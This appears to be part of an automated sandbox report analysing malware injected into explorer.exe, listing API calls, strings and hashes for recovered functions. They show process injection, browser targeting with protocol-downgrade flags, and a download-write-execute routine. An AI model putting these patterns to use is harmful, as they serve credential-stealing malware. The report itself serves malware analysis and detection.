                                                                                                                                                                                                                          • Part of subcall function 0B0A8C50: SetThreadContext.KERNEL32 ref: 0B0A8D44
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0B0A88C6
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Thread$CloseContextCurrentHandle$AllocHeapNextOpenProcessSuspendThread32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4205413918-0
                                                                                                                                                                                                                        • Opcode ID: 9f630cea53e37aabc4ebdd30438db49bbc8a4a76bea8f3890f44f4e46dfe1a39
                                                                                                                                                                                                                        • Instruction ID: 764a81e982f5c7fb487a53f4b2c23c032782e2b172ae5a0e317876c83c9ce246
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9f630cea53e37aabc4ebdd30438db49bbc8a4a76bea8f3890f44f4e46dfe1a39
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 56016D32615B85C6DB18EF52E48061EF7A1F789F80F589535DF9A03B18CF38D0668B00
                                                                                                                                                                                                                        Function 0B0A8B60 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0B0A8610: Sleep.KERNEL32 ref: 0B0A863C
                                                                                                                                                                                                                        • HeapCreate.KERNEL32 ref: 0B0A8B7D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CreateHeapSleep
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 221814145-0
                                                                                                                                                                                                                        • Opcode ID: d0949f20c52cbdce83adff0a9d4d209debc98840f075ddf0d521f5aea9291ecb
                                                                                                                                                                                                                        • Instruction ID: 28ddb402d28b2144e26e299264c78ea8ec20a267d68d175093fa2152d74e1574
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0949f20c52cbdce83adff0a9d4d209debc98840f075ddf0d521f5aea9291ecb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EBE01251F617404FFB6DBBF9588339B2080DF48320F489C788E1945392DF2C9CEA9665

                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                        Function 0DFD17F0 Relevance: 80.8, APIs: 34, Strings: 12, Instructions: 262stringfilethreadCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                                        • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$trusteer
                                                                                                                                                                                                                        • API String ID: 3240663557-511764017
                                                                                                                                                                                                                        • Opcode ID: 352273a83656680a223d5b2e7905f20ea1ceae74909057777973b3f09b6bce98
                                                                                                                                                                                                                        • Instruction ID: 661721a63226fc0102b29da6bf79563d3652a01e029dd922f32558a5b22aacec
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 352273a83656680a223d5b2e7905f20ea1ceae74909057777973b3f09b6bce98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8C14032604B4686EB14DFA6E8547A977A1FF89B88F488136DE4F47B28DF38C149C714
                                                                                                                                                                                                                        Function 0DEF17F0 Relevance: 80.8, APIs: 34, Strings: 12, Instructions: 262stringfilethreadCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                                        • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$trusteer
                                                                                                                                                                                                                        • API String ID: 3240663557-511764017
                                                                                                                                                                                                                        • Opcode ID: 352273a83656680a223d5b2e7905f20ea1ceae74909057777973b3f09b6bce98
                                                                                                                                                                                                                        • Instruction ID: 8247aab8dc86d9818621e105c5b7776d800620d3a8621515317b64077b88a016
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 352273a83656680a223d5b2e7905f20ea1ceae74909057777973b3f09b6bce98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6C13E36204B86C6EB14DFA6E8547A977A1FB89B88F449126DE4F47B18DF3CC149CB10
                                                                                                                                                                                                                        Function 0DFD7070 Relevance: 60.4, APIs: 40, Instructions: 363stringnetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4277384649-0
                                                                                                                                                                                                                        • Opcode ID: e9e3d88c2660faa9b8107988e9f11c171f595eb7b939ad4f509ab47dd1c82600
                                                                                                                                                                                                                        • Instruction ID: e0cc28f319cfb0f7baa378366aff9aad42e9ac998791126c30116df41dad7192
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9e3d88c2660faa9b8107988e9f11c171f595eb7b939ad4f509ab47dd1c82600
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7FF1A272304AC186DB70EF29E8947AA77A2F748B89F489555CA8B5FB54EF78C1C4C700
                                                                                                                                                                                                                        Function 0DEF7070 Relevance: 60.4, APIs: 40, Instructions: 363stringnetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4277384649-0
                                                                                                                                                                                                                        • Opcode ID: e9e3d88c2660faa9b8107988e9f11c171f595eb7b939ad4f509ab47dd1c82600
                                                                                                                                                                                                                        • Instruction ID: 18969254acbec419fd78b2d99fb5c941916ab4dad5cb7b27933eb1dfddafb0ef
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9e3d88c2660faa9b8107988e9f11c171f595eb7b939ad4f509ab47dd1c82600
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CAF16472304A8286DB30AF69E8447BA77A1F748B8DF45A126CB4F57B64DF78C245C710
                                                                                                                                                                                                                        Function 0DFD1370 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 179fileinjectionprocessCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                        • API String ID: 596952117-2766056989
                                                                                                                                                                                                                        • Opcode ID: 07b741d5eb6fd258d833ee65b754d1075427dd1335277d04d7b0c6989ec90e05
                                                                                                                                                                                                                        • Instruction ID: 2d9394720729282fd13211ba4d0f0dad1319202a4a910d388e9711441885091d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07b741d5eb6fd258d833ee65b754d1075427dd1335277d04d7b0c6989ec90e05
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26814D72704B818AE760CF65F8407AEB7A5FB88B98F448125DE8D57B18DF78C059CB14
                                                                                                                                                                                                                        Function 0DEF1370 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 179fileinjectionprocessCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                        • API String ID: 596952117-2766056989
                                                                                                                                                                                                                        • Opcode ID: 07b741d5eb6fd258d833ee65b754d1075427dd1335277d04d7b0c6989ec90e05
                                                                                                                                                                                                                        • Instruction ID: 416f50fad4ed34bfb478d48a82729b7b8b4148456cce4a08190bbcee30d68c46
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07b741d5eb6fd258d833ee65b754d1075427dd1335277d04d7b0c6989ec90e05
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80812876604B81CAD720CF66E8407AEB7A4FB88B98F454226DF8D57B18DF38C145CB10
                                                                                                                                                                                                                        Function 0B0A1370 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 179fileinjectionprocessCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                        • API String ID: 596952117-2766056989
                                                                                                                                                                                                                        • Opcode ID: 07b741d5eb6fd258d833ee65b754d1075427dd1335277d04d7b0c6989ec90e05
                                                                                                                                                                                                                        • Instruction ID: 3a2b40b935f7e4280fc1597e4b84a16701f46c5e2925cae1f98f9c61926a0549
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07b741d5eb6fd258d833ee65b754d1075427dd1335277d04d7b0c6989ec90e05
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A813872604B818AEB60CF66F844B9EBBE5F789B98F540215DE8D57B18DF38C049CB00
                                                                                                                                                                                                                        Function 0DFE5070 Relevance: 21.1, APIs: 14, Instructions: 142stringfilenetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0DFE5112
                                                                                                                                                                                                                        • InternetCrackUrlA.WININET ref: 0DFE5127
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcpyA.KERNEL32 ref: 0DFD70CE
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD70DF
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD70F3
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD7107
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD7118
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD712C
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD714A
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: wsprintfA.USER32 ref: 0DFD7162
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD7176
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD718A
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD71C6
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: WSAStartup.WS2_32 ref: 0DFD71D6
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: socket.WS2_32 ref: 0DFD71F2
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: gethostbyname.WS2_32 ref: 0DFD7209
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: memcpy.MSVCRT ref: 0DFD7229
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: htons.WS2_32 ref: 0DFD7238
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: connect.WS2_32 ref: 0DFD724F
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrlenA.KERNEL32 ref: 0DFD7265
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: send.WS2_32 ref: 0DFD727B
                                                                                                                                                                                                                        • PathFindFileNameA.SHLWAPI ref: 0DFE51A1
                                                                                                                                                                                                                        • GetTempPathA.KERNEL32 ref: 0DFE51BF
                                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32 ref: 0DFE51D5
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFE51E5
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFE51F1
                                                                                                                                                                                                                        • CreateFileA.KERNEL32 ref: 0DFE521A
                                                                                                                                                                                                                        • WriteFile.KERNEL32 ref: 0DFE523F
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DFE524E
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DFE5257
                                                                                                                                                                                                                        • ShellExecuteA.SHELL32 ref: 0DFE5285
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DFE5294
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DFE529F
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3619236930-0
                                                                                                                                                                                                                        • Opcode ID: 7ecfd1c38ba8e442a98d9586bc9e0933db9910eba4d4230b8b6c88557bb2a767
                                                                                                                                                                                                                        • Instruction ID: 52468cfb0ffb09aef775814f15f08ee1f4ad3a8c15bce430e9105539c732b645
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ecfd1c38ba8e442a98d9586bc9e0933db9910eba4d4230b8b6c88557bb2a767
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23518132714A808AEB10DF66E8543AE77A1F788BC8F448415DE895BB68DF78C185CB00
                                                                                                                                                                                                                        Function 0DF05070 Relevance: 21.1, APIs: 14, Instructions: 142stringfilenetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0DF05112
                                                                                                                                                                                                                        • InternetCrackUrlA.WININET ref: 0DF05127
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcpyA.KERNEL32 ref: 0DEF70CE
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF70DF
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF70F3
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF7107
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF7118
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF712C
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF714A
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: wsprintfA.USER32 ref: 0DEF7162
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF7176
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF718A
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF71C6
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: WSAStartup.WS2_32 ref: 0DEF71D6
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: socket.WS2_32 ref: 0DEF71F2
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: gethostbyname.WS2_32 ref: 0DEF7209
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: memcpy.MSVCRT ref: 0DEF7229
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: htons.WS2_32 ref: 0DEF7238
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: connect.WS2_32 ref: 0DEF724F
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrlenA.KERNEL32 ref: 0DEF7265
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: send.WS2_32 ref: 0DEF727B
                                                                                                                                                                                                                        • PathFindFileNameA.SHLWAPI ref: 0DF051A1
                                                                                                                                                                                                                        • GetTempPathA.KERNEL32 ref: 0DF051BF
                                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32 ref: 0DF051D5
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DF051E5
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DF051F1
                                                                                                                                                                                                                        • CreateFileA.KERNEL32 ref: 0DF0521A
                                                                                                                                                                                                                        • WriteFile.KERNEL32 ref: 0DF0523F
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DF0524E
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DF05257
                                                                                                                                                                                                                        • ShellExecuteA.SHELL32 ref: 0DF05285
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DF05294
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DF0529F
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3619236930-0
                                                                                                                                                                                                                        • Opcode ID: 7ecfd1c38ba8e442a98d9586bc9e0933db9910eba4d4230b8b6c88557bb2a767
                                                                                                                                                                                                                        • Instruction ID: e8300fa1b6382eda50c92766fdaae901325801392b9182e047c82ce13e670887
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ecfd1c38ba8e442a98d9586bc9e0933db9910eba4d4230b8b6c88557bb2a767
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE519432714A418AFB10DFA6E8543AE7BA0FB88B88F458026DE4E47B58DF78C145CB10
                                                                                                                                                                                                                        Function 0DFEDC48 Relevance: 19.6, APIs: 13, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __crtGetLocaleInfoA.LIBCMT ref: 0DFEDCA1
                                                                                                                                                                                                                          • Part of subcall function 0DFF4800: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0DFF4820
                                                                                                                                                                                                                          • Part of subcall function 0DFF4800: __crtGetLocaleInfoA_stat.LIBCMT ref: 0DFF483E
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0DFEDCAD
                                                                                                                                                                                                                        • __crtGetLocaleInfoA.LIBCMT ref: 0DFEDCC9
                                                                                                                                                                                                                        • __crtGetLocaleInfoA.LIBCMT ref: 0DFEDD00
                                                                                                                                                                                                                        • _calloc_crt.LIBCMT ref: 0DFEDCDC
                                                                                                                                                                                                                          • Part of subcall function 0DFEE39C: _calloc_impl.LIBCMT ref: 0DFEE3CA
                                                                                                                                                                                                                          • Part of subcall function 0DFEE39C: Sleep.KERNEL32 ref: 0DFEE3E1
                                                                                                                                                                                                                        • _calloc_crt.LIBCMT ref: 0DFEDD17
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DFEDD2F
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DFEDD7B
                                                                                                                                                                                                                        • GetLocaleInfoEx.KERNEL32 ref: 0DFEDD9E
                                                                                                                                                                                                                        • _calloc_crt.LIBCMT ref: 0DFEDDB0
                                                                                                                                                                                                                        • GetLocaleInfoEx.KERNEL32 ref: 0DFEDDC8
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DFEDDD4
                                                                                                                                                                                                                        • GetLocaleInfoEx.KERNEL32 ref: 0DFEDDFF
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale$Info$__crt$_calloc_crtfree$A_statErrorLastSleepUpdateUpdate::__calloc_impl
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2895548159-0
                                                                                                                                                                                                                        • Opcode ID: 5d72b1452663e38c5e4686aaa3876ec32168e7b5e2c31a480d3d4b2684a27660
                                                                                                                                                                                                                        • Instruction ID: bc0f577afedf7f1b6a8bbc8cf2199fe70f95caaa14786b312c90fe8bc2f01e07
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d72b1452663e38c5e4686aaa3876ec32168e7b5e2c31a480d3d4b2684a27660
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C41F422B1928145EB36AA6EED10B3A7695BB89FC4F05C925DF095BF48EF3DC4018710
                                                                                                                                                                                                                        Function 0DF0DC48 Relevance: 19.6, APIs: 13, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __crtGetLocaleInfoA.LIBCMT ref: 0DF0DCA1
                                                                                                                                                                                                                          • Part of subcall function 0DF14800: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0DF14820
                                                                                                                                                                                                                          • Part of subcall function 0DF14800: __crtGetLocaleInfoA_stat.LIBCMT ref: 0DF1483E
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0DF0DCAD
                                                                                                                                                                                                                        • __crtGetLocaleInfoA.LIBCMT ref: 0DF0DCC9
